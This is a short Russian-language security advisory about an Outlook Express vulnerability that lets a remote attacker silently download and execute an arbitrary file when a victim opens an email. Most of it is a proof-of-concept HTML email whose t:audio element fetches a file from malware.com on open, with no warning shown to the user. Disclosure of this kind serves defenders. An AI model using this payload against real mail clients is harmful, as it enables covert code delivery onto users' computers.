Уязвимость обнаружена в Microsoft Outlook Express.
Удаленный атакующий может незаметно
загрузить и выполнить произвольный файл на
компьютере адресата в обход любых
ограничений безопасности в Outlook Express.
Сообщается, что следующий код загрузит
произвольный файл при открытии почтового
сообщения, в установках по умолчанию Outlook
Express: RESTRICTED ZONE:
MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03 http://www..malware.com
<html xmlns:t>
<head><style> t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="http://www.malware.com/freek.asf" />
</body></html>
При этом никакие предупреждения
пользователь не получит.
